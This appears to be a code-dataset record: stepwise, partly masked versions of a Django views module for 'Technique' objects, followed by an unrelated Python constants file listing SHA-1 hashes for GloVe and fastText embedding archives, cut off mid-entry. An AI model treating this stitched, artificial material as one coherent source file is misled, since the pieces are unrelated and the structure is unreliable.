"step-3": "<mask token>\n\n\ndef list(request):\n techniques = Technique.objects.annotate(num_images=Count('images')\n ).order_by('-num_images')\n return render_to_response('technique/list.html', {'techniques':\n techniques}, RequestContext(request))\n\n\ndef view(request, pk):\n t = Technique.objects.get(pk=pk)\n related = filter(lambda x: x, [t2 for t2 in t.starting_at.all()] + [t2 for\n t2 in t.ending_at.all()] + [t2 for t2 in t.children.all()] + [t.\n start, t.end])\n return render_to_response('technique/view.html', {'t': t, 'related':\n related}, RequestContext(request))\n\n\n@login_required\ndef create(request, pk=None):\n if pk:\n t = Technique.objects.get(pk=pk)\n else:\n t = Technique(created_by=request.user)\n if request.method == 'POST':\n f = TechniqueForm(request.POST, instance=t)\n image_formset = TechniqueImageFormset(request.POST, request.FILES,\n instance=t)\n if f.is_valid():\n t = f.save(commit=False)\n image_formset = TechniqueImageFormset(request.POST, request.\n FILES, instance=t)\n if image_formset.is_valid():\n t.save()\n for i in image_formset.save(commit=False):\n i.created_by = request.user\n i.technique = t\n i.save()\n return redirect(reverse('technique.views.view', args=(t.pk,)))\n else:\n f = TechniqueForm(instance=t)\n image_formset = TechniqueImageFormset(instance=t)\n return render_to_response('technique/create.html', {'f': f,\n 'image_formset': image_formset}, RequestContext(request))\n",
"step-4": "import pdb\nfrom django.db.models import Count\nfrom django.shortcuts import render_to_response, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.template import RequestContext\nfrom models import *\nfrom forms import *\nfrom django.http import HttpResponse\n\n\ndef list(request):\n techniques = Technique.objects.annotate(num_images=Count('images')\n ).order_by('-num_images')\n return render_to_response('technique/list.html', {'techniques':\n techniques}, RequestContext(request))\n\n\ndef view(request, pk):\n t = Technique.objects.get(pk=pk)\n related = filter(lambda x: x, [t2 for t2 in t.starting_at.all()] + [t2 for\n t2 in t.ending_at.all()] + [t2 for t2 in t.children.all()] + [t.\n start, t.end])\n return render_to_response('technique/view.html', {'t': t, 'related':\n related}, RequestContext(request))\n\n\n@login_required\ndef create(request, pk=None):\n if pk:\n t = Technique.objects.get(pk=pk)\n else:\n t = Technique(created_by=request.user)\n if request.method == 'POST':\n f = TechniqueForm(request.POST, instance=t)\n image_formset = TechniqueImageFormset(request.POST, request.FILES,\n instance=t)\n if f.is_valid():\n t = f.save(commit=False)\n image_formset = TechniqueImageFormset(request.POST, request.\n FILES, instance=t)\n if image_formset.is_valid():\n t.save()\n for i in image_formset.save(commit=False):\n i.created_by = request.user\n i.technique = t\n i.save()\n return redirect(reverse('technique.views.view', args=(t.pk,)))\n else:\n f = TechniqueForm(instance=t)\n image_formset = TechniqueImageFormset(instance=t)\n return render_to_response('technique/create.html', {'f': f,\n 'image_formset': image_formset}, RequestContext(request))\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
# coding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=too-many-lines
"""Constants."""
UNK_TOKEN = '<unk>'
BOS_TOKEN = '<bos>'
EOS_TOKEN = '<eos>'
PAD_TOKEN = '<pad>'
UNK_IDX = 0  # This should not be changed as long as serialized token
             # embeddings redistributed on S3 contain an unknown token.
             # Blame this code change and see commit for more context.
LARGE_POSITIVE_FLOAT = 1e18
LARGE_NEGATIVE_FLOAT = -LARGE_POSITIVE_FLOAT
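# (npz file name, SHA-1) pairs for the pre-trained GloVe embedding archives, keyed by embedding name.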
GLOVE_NPZ_SHA1 = \
{'glove.42B.300d': ('glove.42B.300d.npz',
'7deee8f4860744db53ed9e50892effe9883e6d89'),
'glove.6B.100d': ('glove.6B.100d.npz',
'01f80f202fcabcc3e0804898349087bfc191dd1c'),
'glove.6B.200d': ('glove.6B.200d.npz',
'5e6e2bdab346c257f88d80d215d518e680d86e32'),
'glove.6B.300d': ('glove.6B.300d.npz',
'1db264aa936be62f055dfb72854204450bdf4399'),
'glove.6B.50d': ('glove.6B.50d.npz',
'aa16be8d184399d2199f83fd62586f2c30497bfa'),
'glove.840B.300d': ('glove.840B.300d.npz',
'b4ba390c1154736e07c0e67d9180935f5930e83c'),
'glove.twitter.27B.100d': ('glove.twitter.27B.100d.npz',
'0f7b82c223451d0002f79ba23596983cdbe0e2b1'),
'glove.twitter.27B.200d': ('glove.twitter.27B.200d.npz',
'41cc2d26f58a54622ce96bf6c8434360ab524f20'),
'glove.twitter.27B.25d': ('glove.twitter.27B.25d.npz',
'9f563d2f296995598cc46812b2fda05ad4c3c879'),
'glove.twitter.27B.50d': ('glove.twitter.27B.50d.npz',
'ce9959c056f2a0a780c468feeb4f823af51630e9')}
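# (npz file name, SHA-1) pairs for the pre-trained fastText embedding archives, keyed by embedding name.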
FAST_TEXT_NPZ_SHA1 = \
{'crawl-300d-2M': ('crawl-300d-2M.npz',
'9dd611a1fe280c63050cd546d3595400fc0eede4'),
'wiki.aa': ('wiki.aa.npz',
'48f163b80eb37f1806142169d3d4c05cf75b7339'),
'wiki.ab': ('wiki.ab.npz',
'860ceff119dd27e5b701b605879037c1310cbc3e'),
'wiki.ace': ('wiki.ace.npz',
'62938287464040491719f56a6f521f8f808beee8'),
'wiki.ady': ('wiki.ady.npz',
'646843afa260d018ed711df3f1ca9c3e000447b6'),
'wiki.af': ('wiki.af.npz',
'7b14cd27690b67fea318d0bac2283c16430680e2'),
'wiki.ak': ('wiki.ak.npz',
'20f309adad1c45958c97b6055d5838e05bbaea72'),
'wiki.als': ('wiki.als.npz',
'a8b03aa133c4f7da12fc27c2b167b7918b1e9805'),
'wiki.am': ('wiki.am.npz',
'ed3dd10cea64737f7a1623612ee099df9dc19f66'),
'wiki.ang': ('wiki.ang.npz',
'8efe64706d9d6b8eae38b2c7ff0b277e20592bc7'),
'wiki.an': ('wiki.an.npz',
'168046283c719ab96a29b1abae2e25a6575c7be8'),
'wiki.arc': ('wiki.arc.npz',
'049021b7decea4bc009b12936e56b4dbf5b760e7'),
'wiki.ar': ('wiki.ar.npz',
'7e325e1e98dfcdc9368d2ebe40ee834a2ed44912'),
'wiki.arz': ('wiki.arz.npz',
'7d851c2c7be3ee6f7fd896de7b76ea08e3fb08b0'),
'wiki.as': ('wiki.as.npz',
'01d38c29cd4bd99c1a8534abc058822da14a5b9c'),
'wiki.ast': ('wiki.ast.npz',
'9c9846ba5084505a0adea89c95c66e04efbf5ce9'),
'wiki.av': ('wiki.av.npz',
'7ef6a920c364638504e673cfde5f7675503fa81e'),
'wiki.ay': ('wiki.ay.npz',
'c1202e110930e3902397f5cb64a8359e013b469f'),
'wiki.azb': ('wiki.azb.npz',
'10351b7ef14ec2cb610d290cb6a3f6987ef5d8b3'),
'wiki.az': ('wiki.az.npz',
'74257c3bcd533a606afae509ea835dc036d61546'),
'wiki.ba': ('wiki.ba.npz',
'4a2857ed694d66864df562b376c2fa12fcb03646'),
'wiki.bar': ('wiki.bar.npz',
'e65c6b7e9ff83798d1eea05d166148837d53e615'),
'wiki.bat_smg': ('wiki.bat_smg.npz',
'6420584ae28ba6c9dd145fea8f096243d457c2d8'),
'wiki.bcl': ('wiki.bcl.npz',
'33606c970ab336b678393e2bdb8af2116d11cf7b'),
'wiki.be': ('wiki.be.npz',
'84487d341e333344cf71bc12c7a205d923762498'),
'wiki.bg': ('wiki.bg.npz',
'56f2a175b1a1d1a9cf9f1cea277cd0b46ffd7f66'),
'wiki.bh': ('wiki.bh.npz',
'07473989853a344a41aaa18f41030dc56d0d01c7'),
'wiki.bi': ('wiki.bi.npz',
'08adfa3c9ef3016d30ef69ea539d217ff67eda09'),
'wiki.bjn': ('wiki.bjn.npz',
'998a551283222931d3a26922308449950bfa3ec7'),
'wiki.bm': ('wiki.bm.npz',
'454ff9fbd4790e4a076d9a2087a51da28aa1332f'),
'wiki.bn': ('wiki.bn.npz',
'1f36f6f39c9a9b33bb8035c9a4dc7e04933604fd'),
'wiki.bo': ('wiki.bo.npz',
'b9fe87318428de0a7790de175b5fec80c5af482d'),
'wiki.bpy': ('wiki.bpy.npz',
'5c7853173d27e2c018c24eca69de8d5f34511b0d'),
'wiki.br': ('wiki.br.npz',
'7aa66a2034fbfaa1d39e637385d48610238797c9'),
'wiki.bs': ('wiki.bs.npz',
'a019a4677677c2e9e4d899326b2b6c15ad6c011a'),
'wiki.bug': ('wiki.bug.npz',
'09ae3477941d7a99d1df494368d7efb0b2c18913'),
'wiki.bxr': ('wiki.bxr.npz',
'b832c691b8ddd95896c052d3d15e1f98d72068d5'),
'wiki.ca': ('wiki.ca.npz',
'391e0d4daad08649251274fa1cc2a5f49c7728b1'),
'wiki.cbk_zam': ('wiki.cbk_zam.npz',
'02e57a763bc9f9eadaba57953383dd12a0a78a37'),
'wiki.cdo': ('wiki.cdo.npz',
'd6e8f422327e8b2273f1f2662d793707ece6695d'),
'wiki.ceb': ('wiki.ceb.npz',
'23bc0bb9aeaa57dff35092766941a866de142aae'),
'wiki.ce': ('wiki.ce.npz',
'182b2a889256119a6d379d501c55c7621e5855db'),
'wiki.ch': ('wiki.ch.npz',
'82dd77512fcb463481f43c9cef3507e2baa90d7b'),
'wiki.cho': ('wiki.cho.npz',
'b0b620fc2442d1a6e2440e71a424861c80175f0c'),
'wiki.chr': ('wiki.chr.npz',
'3d62c6b95c5af46abd6234426ae760cca65d5bd0'),
'wiki.chy': ('wiki.chy.npz',
'34a28a22da79aebc100e3714b825c95c8d5f54a3'),
'wiki.ckb': ('wiki.ckb.npz',
'ad19461e4be583d08b7693ff5b1e9d590ed41add'),
'wiki.co': ('wiki.co.npz',
'fa60d9f0e79f1c7e15f381aef983a0f4f31c05a8'),
'wiki.crh': ('wiki.crh.npz',
'540270ba6edd9d7b2f7efca52b3b407524ac67d1'),
'wiki.cr': ('wiki.cr.npz',
'f06b77465a38ec960d7d5a7554b848c37e945c76'),
'wiki.csb': ('wiki.csb.npz',
'b8b28559cf2541341af98e2aa755856765bdeabf'),
'wiki.cs': ('wiki.cs.npz',
'19881e931fe06abf341450f00c342d364313e232'),
'wiki.cu': ('wiki.cu.npz',
'731e0d00abd53bc2a8eb6cf37f6ab883cff34e15'),
'wiki.cv': ('wiki.cv.npz',
'e60034fcffb7dfef7b236ddba1194c3aa20b7967'),
'wiki.cy': ('wiki.cy.npz',
'5a0fb967b5556f007c0d5065f951a3d3b1c1005a'),
'wiki.da': ('wiki.da.npz',
'd06258014ba2c7450bc2d55edfdf1731433e42e5'),
'wiki.de': ('wiki.de.npz',
'a21694dfd2af63bd7bb00f0b60b28e88bd1153f1'),
'wiki.diq': ('wiki.diq.npz',
'4f6c77a86b39834a7130419967759afd8cc26b84'),
'wiki.dsb': ('wiki.dsb.npz',
'e74f1d346a8db96987bff0c33ee5f886907c380a'),
'wiki.dv': ('wiki.dv.npz',
'5d6fe6f0eec2e7704121d5aba03b4edbb28af873'),
'wiki.dz': ('wiki.dz.npz',
'77c639d36d0355b2de5adead7996eae342b852a6'),
'wiki.ee': ('wiki.ee.npz',
'4b5a76127d57515d3e8a76787cdefde5856b754a'),
'wiki.el': ('wiki.el.npz',
'a00bcb97e7898931196a1c69f7a492e5b6202661'),
'wiki.eml': ('wiki.eml.npz',
'b475d626b3d97e7a68c02827fdc7900599e838c6'),
'wiki.en': ('wiki.en.npz',
'ad5ec6d49db6c6fe76b8e85ff05d34e5d0e1eb6a'),
'wiki.eo': ('wiki.eo.npz',
'18049b0010520d13e676f5a82e8bb90153d99003'),
'wiki.es': ('wiki.es.npz',
'a6d192ba7d82d762f8367e75ca951aad4d11e410'),
'wiki.et': ('wiki.et.npz',
'4beb7025cf88f1aa62d025b187f0cb09aee61858'),
'wiki.eu': ('wiki.eu.npz',
'5e1a8197e35f20a2476798bbb935b4c131289c4f'),
'wiki.ext': ('wiki.ext.npz',
'049b2d1b0a8b102b45907cf487cac30aa294e0a0'),
'wiki.fa': ('wiki.fa.npz',
'81ed274997c87ef87d73d25e166ca06272ce426f'),
'wiki.ff': ('wiki.ff.npz',
'4867dc74cd53ca0b0f769af4fa1ea420406b59bf'),
'wiki.fi': ('wiki.fi.npz',
'6d1291b854045179f8171ac7d62ede7d8ac159a2'),
'wiki.fiu_vro': ('wiki.fiu_vro.npz',
'dd87806d9dc8833fa0e21e35a50815ebdbaa6c8b'),
'wiki.fj': ('wiki.fj.npz',
'cf5c31b0a69276f5dd18ab738ed92444abaeb755'),
'wiki.fo': ('wiki.fo.npz',
'ffc19807d528af000861a94cfb8097bd686e14fc'),
'wiki.fr': ('wiki.fr.npz',
'8f06d5dbe3cf7214354fe9b2f6eca0ef7419f063'),
'wiki.frp': ('wiki.frp.npz',
'c8b200ae592478d3cd0bfaafcd7aa19de8a3bfe5'),
'wiki.frr': ('wiki.frr.npz',
'fa5e5c39ea2a45793c679eacea290a35e37405ea'),
'wiki.fur': ('wiki.fur.npz',
'a61a8940d059f25000e3fe23933e5ed0d37e65d3'),
'wiki.fy': ('wiki.fy.npz',
'46f9f41bdf6f4fb8e27a753290413d745465963b'),
'wiki.gag': ('wiki.gag.npz',
'49fb01230e6803544122d47ab7d3fe694d1444f2'),
'wiki.gan': ('wiki.gan.npz',
'716b7b26acc15975f30caf3c6effa111516fcca5'),
'wiki.ga': ('wiki.ga.npz',
'ea934bc1fdc1acf6caf9ac746c6c499251f1fdee'),
'wiki.gd': ('wiki.gd.npz',
'597017b5a32d933f194595d3656f858e37e70a62'),
'wiki.glk': ('wiki.glk.npz',
'91a5834658bc2d48714e8807ef24efb79567b4b5'),
'wiki.gl': ('wiki.gl.npz',
'2fa8e48d6ae1e9c9d542eb3f2156cf9e359e66c2'),
'wiki.gn': ('wiki.gn.npz',
'e359eef3928e1f1b5d8fcf0ea532e8794c66289a'),
'wiki.gom': ('wiki.gom.npz',
'8cd361481c23f7545cc2bd8f1bf22aa7400edd4d'),
'wiki.got': ('wiki.got.npz',
'd05daf105611150695e61775fdff2c500b36be3f'),
'wiki.gu': ('wiki.gu.npz',
'0ce175c5fc39bab4032892f70c9d2bb850af0f4a'),
'wiki.gv': ('wiki.gv.npz',
'2c573f873d607831ff01b64603c17b8db79bd7e1'),
'wiki.hak': ('wiki.hak.npz',
'e6048727799cdf149f5c50037e0fc59300d33a94'),
'wiki.ha': ('wiki.ha.npz',
'f18ea7286bbd390c5470896b2c99cb1adc740064'),
'wiki.haw': ('wiki.haw.npz',
'18bcd85d2e06b1b889f0835fc5b62697fdf32d72'),
'wiki.he': ('wiki.he.npz',
'76915ff167b6ecb7b7e22ff0ca46914a55d344af'),
'wiki.hif': ('wiki.hif.npz',
'12153aaf98d76d5502ab77a27cd0b9a539f61513'),
'wiki.hi': ('wiki.hi.npz',
'249666a598991f6ec147954c6af9e531fd1cd94e'),
'wiki.ho': ('wiki.ho.npz',
'3f804fd69780c0789708b56ea9d48715f8e38f26'),
'wiki.hr': ('wiki.hr.npz',
'9a3de28e69f97048bfb480b4f83eaab6149f66ad'),
'wiki.hsb': ('wiki.hsb.npz',
'7070bf64e13299dd66ac0e9f8e24011a56b6bfe8'),
'wiki.ht': ('wiki.ht.npz',
'a607093d511afeb584d02dc676bc5a27eff66287'),
'wiki.hu': ('wiki.hu.npz',
'9b2c4750daf1bcf39768572e874b5afda0e2f0bc'),
'wiki.hy': ('wiki.hy.npz',
'ec0461a102a6fb00bd324f66cefd3c8d55a7093a'),
'wiki.hz': ('wiki.hz.npz',
'5dfb8afbdae6b4148c3e55ab459c56a74b46b463'),
'wiki.ia': ('wiki.ia.npz',
'4cfaaf053b9513bbf5b2423258c0f01d20256de6'),
'wiki.id': ('wiki.id.npz',
'bace396bb9941cc9e5b2e5f5a19be6db833c5fd4'),
'wiki.ie': ('wiki.ie.npz',
'1bae7256c2e763ce6d692d1c0a603d99a8b22826'),
'wiki.ig': ('wiki.ig.npz',
'23128e54a5e143891d392d621723bad9cfc8cf7b'),
'wiki.ii': ('wiki.ii.npz',
'54bc16d05da512481865a89ecf30260b0acc04dc'),
'wiki.ik': ('wiki.ik.npz',
'f8015227e893d2375699b7d132b306ba381f02ac'),
'wiki.ilo': ('wiki.ilo.npz',
'185a11f81bd5d24a34558dda81ee4735f5ba150b'),
'wiki.io': ('wiki.io.npz',
'ddf8180a90aa6ee5be93a2582cc99c535f21363e'),
'wiki.is': ('wiki.is.npz',
'968f8dd2a093b279a6f7aaa734008454bf51d724'),
'wiki.it': ('wiki.it.npz',
'fdfb857a309b2c3d29482bb5cc55f21b858d2e6f'),
'wiki.iu': ('wiki.iu.npz',
'fa8896730bd6c24c3473daa22116d1016294e7f7'),
'wiki.jam': ('wiki.jam.npz',
'a8f0d0b99c89ace0a6401b8fcda261d06065faaf'),
'wiki.ja': ('wiki.ja.npz',
'8d42e5a40e4d1d8645b2d80b873a65cadcf68b5c'),
'wiki.jbo': ('wiki.jbo.npz',
'145fc999ab004b348cf9bf445f0a93a7a145308b'),
'wiki.jv': ('wiki.jv.npz',
'66978770bf06e42414395cf5fd8c596044d72bec'),
'wiki.kaa': ('wiki.kaa.npz',
'624a640ecb9901b2aba2e9f44ab615146ecb2862'),
'wiki.kab': ('wiki.kab.npz',
'e97f93b6ba65e95c85b7541932cf53c5ad9eb896'),
'wiki.ka': ('wiki.ka.npz',
'1ca8376e1e0cbd58001c1b51a2d488a2874a6743'),
'wiki.kbd': ('wiki.kbd.npz',
'f2d2a05b06723ac549784ad5470d84f5742a1352'),
'wiki.kg': ('wiki.kg.npz',
'fa7f6d5f660a173a3e75342d449980eedcdc789e'),
'wiki.ki': ('wiki.ki.npz',
'21a8c7c616c0050c51c288861f3423f313e4f634'),
'wiki.kj': ('wiki.kj.npz',
'f3c347509a0d81f4f7fdbb8b22889b8d76e5014e'),
'wiki.kk': ('wiki.kk.npz',
'bc24a3289e1c1e18e16b6789c2f9f92af1e73071'),
'wiki.kl': ('wiki.kl.npz',
'b8b7e7359f067836e2be2ecfe9f35a820b00fe1d'),
'wiki.km': ('wiki.km.npz',
'e053799fd01463808432dc035bef3e36620e2f36'),
'wiki.kn': ('wiki.kn.npz',
'2849a0a8b3453e9bf6af05d4c7bd3db881dd1068'),
'wiki.koi': ('wiki.koi.npz',
'a9b02e9bd41833bcd54769f94626019c03f29997'),
'wiki.ko': ('wiki.ko.npz',
'764d9896e74b5a26c6884d48bce3bed8ed3a7822'),
'wiki.krc': ('wiki.krc.npz',
'bfe39598c718f1cc95909db7544b3214b308a97c'),
'wiki.kr': ('wiki.kr.npz',
'1e6af853d4a8ea7830e116eb9b61ac5d7d9a315c'),
'wiki.ksh': ('wiki.ksh.npz',
'66cd0e3e0a0b0282a13960571ebe7cddd7706bf2'),
'wiki.ks': ('wiki.ks.npz',
'85f1adaa05b854df4dede745a1aaab3836e60770'),
'wiki.ku': ('wiki.ku.npz',
'faf90584e5a45e6d0f9eeb88399b82abe037d584'),
'wiki.kv': ('wiki.kv.npz',
'9f2b41822013a412da9c99fac06eed8be03ca192'),
'wiki.kw': ('wiki.kw.npz',
'3eed8a8fc97a2fc79241b8474a458c98d00fc897'),
'wiki.ky': ('wiki.ky.npz',
'0116ff90f10a6c0728e1ea86d8a44896ea83270a'),
'wiki.lad': ('wiki.lad.npz',
'5af2015b3d1c5e8563f0e92721580988ebe2ce50'),
'wiki.la': ('wiki.la.npz',
'7143303a3ea13c7668eb90ea6e3d2ca69857a3be'),
'wiki.lbe': ('wiki.lbe.npz',
'f206a3c35a184ba5d2b32ee68640eadf66c847da'),
'wiki.lb': ('wiki.lb.npz',
'143dc6337f3690379282034c460c613d7f144923'),
'wiki.lez': ('wiki.lez.npz',
'b29a680decc6b29f24e8eb9e4f8e11e3419d45f1'),
'wiki.lg': ('wiki.lg.npz',
'866640ce62cedbc1d453b7ea3c289c291ad76e13'),
'wiki.lij': ('wiki.lij.npz',
'0dcd3d7009ae89b1016ca6cdb99a9f0d70bc4baf'),
'wiki.li': ('wiki.li.npz',
'4666b3c238256d7b7623a136db19b8b9f4754734'),
'wiki.lmo': ('wiki.lmo.npz',
'ac89fa7cfe0675950bcb31c66bf3f88a3cfc98f0'),
'wiki.ln': ('wiki.ln.npz',
'fba158719944aabe58e0002a90be0ed77e11702d'),
'wiki.lo': ('wiki.lo.npz',
'1e113e340a8a93d385e14502c9c4e3bcdf6c3101'),
'wiki.lrc': ('wiki.lrc.npz',
'42cb755f398fba6f0da7949c91e92b55654bd482'),
'wiki.ltg': ('wiki.ltg.npz',
'182f75859e228d1162215f28fe7f2dca127624a4'),
'wiki.lt': ('wiki.lt.npz',
'66aa944bd2e777cb82d6d59b1f2f837b6c48cb37'),
'wiki.lv': ('wiki.lv.npz',
'2be8f926da85694fa998bf79d80b61ebb8d67576'),
'wiki.mai': ('wiki.mai.npz',
'b8a9c36e2a0f1bb84a44dc762250d2a9007ef637'),
'wiki.map_bms': ('wiki.map_bms.npz',
'6f0394d6b3d08a946e3df4b9355efe94148f018a'),
'wiki.mdf': ('wiki.mdf.npz',
'774ee35334641db57f9ac9069961c5372a5d92e8'),
'wiki.mg': ('wiki.mg.npz',
'496c48ef668f08ce95ebb11ce1ce5026b52d935c'),
'wiki.mh': ('wiki.mh.npz',
'352edd84f99c5aa277a7306f6cacea1fab065ed3'),
'wiki.mhr': ('wiki.mhr.npz',
'dd78b27a674ac10411cdf74ac32f9391506b17e0'),
'wiki.min': ('wiki.min.npz',
'628b406441ab03bc8aa68195ada50bfdc8226f34'),
'wiki.mi': ('wiki.mi.npz',
'754127b473861cd4f9ae034c9f527a34827b1f00'),
'wiki.mk': ('wiki.mk.npz',
'b09fed4f56c296f13c4020ef1fec498382a38b73'),
'wiki.ml': ('wiki.ml.npz',
'02fb55d97ca2f0408f0e7e8dd6a661bbc3319a2a'),
'wiki.mn': ('wiki.mn.npz',
'08b2c45689aa5d9ec49df96dc7c777ce9b9a0b4b'),
'wiki.mo': ('wiki.mo.npz',
'638c2e8bd2352fd52921b9ae62f578b8357bab49'),
'wiki.mrj': ('wiki.mrj.npz',
'ec5cf1f4fb8dfdca64d8172974e620eb8fa41626'),
'wiki.mr': ('wiki.mr.npz',
'074dd68c947c2f137a3e84b55012925f00213139'),
'wiki.ms': ('wiki.ms.npz',
'3dbe9e9d70251de8a374776ff1250a9c3103ee59'),
'wiki.mt': ('wiki.mt.npz',
'f5103998a68d1b178387417436a83123d44aba01'),
'wiki.multi.ar': ('wiki.multi.ar.npz',
'a010d1d81a465c56ebaf596b3e8e8795e7f0f8e3'),
'wiki.multi.bg': ('wiki.multi.bg.npz',
'c04018f3a600cee170f12a36cdd35b4727a2aade'),
'wiki.multi.ca': ('wiki.multi.ca.npz',
'eef52a0cf20c133ca9065de25f0702861a8cfa29'),
'wiki.multi.cs': ('wiki.multi.cs.npz',
'c5f547aa78c0e3d7dae67a0334d500bf2a86aa30'),
'wiki.multi.da': ('wiki.multi.da.npz',
'24374f2ee169b33327feeee46da31b0de1622fe4'),
'wiki.multi.de': ('wiki.multi.de.npz',
'2e6c119b345bebd34b56eaaf855d6703889b11f7'),
'wiki.multi.el': ('wiki.multi.el.npz',
'9d122beedb80a2e5334946641e5bafd32c01e76b'),
'wiki.multi.en': ('wiki.multi.en.npz',
'8c3c480b4cb2690304173713a646280613b244a8'),
'wiki.multi.es': ('wiki.multi.es.npz',
'483a22656e4fb2a01e9f4ef8156b261e780850ab'),
'wiki.multi.et': ('wiki.multi.et.npz',
'22498c7b91645a3874fa738b5cfb16bf98b6f97c'),
'wiki.multi.fi': ('wiki.multi.fi.npz',
'765a6f0b63777bff4ae6ca2b461c5889c03d6a70'),
'wiki.multi.fr': ('wiki.multi.fr.npz',
'decd9aacf600114b8a36072535c0309874a37c83'),
'wiki.multi.he': ('wiki.multi.he.npz',
'7eee940c1b85936f59122f4b1a166223dd946674'),
'wiki.multi.hr': ('wiki.multi.hr.npz',
'1673963416af088f8bf15576afb33d58115db35c'),
'wiki.multi.hu': ('wiki.multi.hu.npz',
'a1fbe6ededf3cbaa3eaa22dd8b20cce4b36cfc6d'),
'wiki.multi.id': ('wiki.multi.id.npz',
'6c3e721febb511ede7db7bf978d65769e4270f5c'),
'wiki.multi.it': ('wiki.multi.it.npz',
'fc5bfc11e0165e8d95c1708573dad5e456826c73'),
'wiki.multi.mk': ('wiki.multi.mk.npz',
'6cd50198355674f156fc863108d9bebf11cfabd9'),
'wiki.multi.nl': ('wiki.multi.nl.npz',
'4fa06b9230c95dfa5a9e9a5d80f1f5ba614d3cbf'),
'wiki.multi.no': ('wiki.multi.no.npz',
'63756168c1101e73fba8d1a5015f32b8892819e6'),
'wiki.multi.pl': ('wiki.multi.pl.npz',
'958b8e8bead965ba1bb1433e1c960fc3e12a10fb'),
'wiki.multi.pt': ('wiki.multi.pt.npz',
'22f07df1609d79b95344ee575ea43141424a1528'),
'wiki.multi.ro': ('wiki.multi.ro.npz',
'73180b3e382519004bf38ea7b86237aacbbe813a'),
'wiki.multi.ru': ('wiki.multi.ru.npz',
'3b2eb9163f35e90bf2ce1cd3c997b354d0c34f59'),
'wiki.multi.sk': ('wiki.multi.sk.npz',
'606a0c3ba9849070c6b6b8c22d920fdeed9a1385'),
'wiki.multi.sl': ('wiki.multi.sl.npz',
'3cfdab5043b8cfe1535cb6dbd4c9e68847ad5904'),
'wiki.multi.sv': ('wiki.multi.sv.npz',
'4f1494885b9a831e87cfa3c15f2204c4a73c0779'),
'wiki.multi.tr': ('wiki.multi.tr.npz',
'54f90d5ddb9a65538a41e37c5a67ed933a5e4885'),
'wiki.multi.uk': ('wiki.multi.uk.npz',
'500fd26b1d7a25b42458012e99f9f76642e0c787'),
'wiki.multi.vi': ('wiki.multi.vi.npz',
'3955809cceb300965c15f9372221417719bb0db8'),
'wiki.mus': ('wiki.mus.npz',
'a5f48934a3fa6eaf4929098046c93fc94dd6bcb6'),
'wiki.mwl': ('wiki.mwl.npz',
'8a5e2c272166f8a72c5694ca6c3104d5f49179ec'),
'wiki.my': ('wiki.my.npz',
'5e035aca16700d7d6695af8a6d3a88ac847aaeb7'),
'wiki.myv': ('wiki.myv.npz',
'd4cfaab70c640033e02c0fc0c5a3615ae836c569'),
'wiki.mzn': ('wiki.mzn.npz',
'ad09ac584ae455b5862b95125ef409360ae18445'),
'wiki.nah': ('wiki.nah.npz',
'2dc454ef37d059f2053af46cfa1f4f0ca939cba0'),
'wiki.na': ('wiki.na.npz',
'401f0f880eb7aa78d21348bc1e0a3953b3e81bf0'),
'wiki.nap': ('wiki.nap.npz',
'996da46aeeab5644ba766d00c5e343b1553361d7'),
'wiki.nds_nl': ('wiki.nds_nl.npz',
'5a9307e16b13a5a82ec19a52b33254537e7198e7'),
'wiki.nds': ('wiki.nds.npz',
'b249a87c78c52becf51e7b50aaf9f9b6a36585f1'),
'wiki.ne': ('wiki.ne.npz',
'a601db2647a74ffd2b4b43dcb8584735f555459c'),
'wiki.new': ('wiki.new.npz',
'c398a3775aba9c68ce765cfdfb6b188f7c47e4c6'),
'wiki-news-300d-1M': ('wiki-news-300d-1M.npz',
'0a03bbd508e5381e140476140fb121afeb0050ed'),
'wiki-news-300d-1M-subword': ('wiki-news-300d-1M-subword.npz',
'69edae21375407781c727dcb9e534e79d712d137'),
'wiki.ng': ('wiki.ng.npz',
'befd774d15f69d43547e13e5ea3a97c4cb1ab405'),
'wiki.nl': ('wiki.nl.npz',
'5a7cb6f1dd0a7621202abba9461ac2c5bf905219'),
'wiki.nn': ('wiki.nn.npz',
'8e5059ddeb24050fadaa5cc4622b13feb3e4a226'),
'wiki.no': ('wiki.no.npz',
'5ce6e0f793e66f081652f64013968099de03d9f9'),
'wiki.nov': ('wiki.nov.npz',
'95ed23b4cfd7a65afa1c12c7dbdce6af53923d77'),
'wiki.vec': ('wiki.vec.npz',
'08ebb912efeb9df1c7d05e1af90484d210dff47e'),
'wiki.nrm': ('wiki.nrm.npz',
'e58614b4508ff9810f0b58fd818f973775bc918d'),
'wiki.nso': ('wiki.nso.npz',
'56a2ebe260241402d117cd89c5c872b9c96ff05b'),
'wiki.nv': ('wiki.nv.npz',
'c713051fe03ec1f60314bb42161b2a47fb5e169a'),
'wiki.ny': ('wiki.ny.npz',
'ba5a1725955cbc13e7fd93ab499f8085840c992c'),
'wiki.oc': ('wiki.oc.npz',
'259e7d994c38a4cfc140fb07016b82d6781e5027'),
'wiki.olo': ('wiki.olo.npz',
'0fea70f887def4779ee70a79366b88f1ada65004'),
'wiki.om': ('wiki.om.npz',
'47e2d756b5f8913085d901375c1b4e0b118a4221'),
'wiki.or': ('wiki.or.npz',
'7e274ab060219b019aa02bb97941cc6e162fd01f'),
'wiki.os': ('wiki.os.npz',
'19e8199cc2aaffdb07b6c558dbc5465ac6e03155'),
'wiki.pag': ('wiki.pag.npz',
'eddf4931547649026c02f893297ef673ec6158bb'),
'wiki.pam': ('wiki.pam.npz',
'40109aa174bd9f0fa657839bb548e2b0646c58d3'),
'wiki.pa': ('wiki.pa.npz',
'8a5870717e9e641b1f757f13259171698118de2e'),
'wiki.pap': ('wiki.pap.npz',
'999c8e5b005ca20d9998fbbe4fa79177f69e24c0'),
'wiki.pcd': ('wiki.pcd.npz',
'e975066b323a65cdc5e4c27138ef674d2cf7250b'),
'wiki.pdc': ('wiki.pdc.npz',
'5c770b9d56f276b0aa535845f175c05ee1cea615'),
'wiki.pfl': ('wiki.pfl.npz',
